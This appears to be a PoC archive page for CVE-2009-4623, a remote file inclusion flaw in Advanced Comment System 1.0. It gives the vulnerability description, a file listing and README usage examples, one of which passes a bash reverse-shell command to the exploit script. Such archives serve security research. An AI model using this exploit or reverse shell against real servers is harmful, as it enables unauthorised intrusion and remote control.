Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2009-4623 PoC — Plohni Advanced Comment System 代码注入漏洞

Source
Associated Vulnerability
Title:Plohni Advanced Comment System 代码注入漏洞 (CVE-2009-4623)
Description:Multiple PHP remote file inclusion vulnerabilities in Advanced Comment System 1.0 allow remote attackers to execute arbitrary PHP code via a URL in the ACS_path parameter to (1) index.php and (2) admin.php in advanced_comment_system/. NOTE: this might only be a vulnerability when the administrator has not followed installation instructions in install.php. NOTE: this might be the same as CVE-2020-35598.
Description
Advanced Comment System 1.0 - Remote Command Execution (RCE) 
Readme
# Advanced Comment System 1.0 - Remote Command Execution (RCE)
> https://nvd.nist.gov/vuln/detail/CVE-2009-4623

## Examples
```bash
python3 exploit.py http://127.0.0.1 uname -a
```

```bash
python3 exploit.py http://127.0.0.1 'bash -i >& /dev/tcp/127.0.0.1/443 0>&1'
```
File Snapshot

[4.0K] /data/pocs/00c86148bee7c284c5f118c17fb46ac14099b0cb ├── [1.7K] exploit.py ├── [1.0K] LICENSE └── [ 272] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →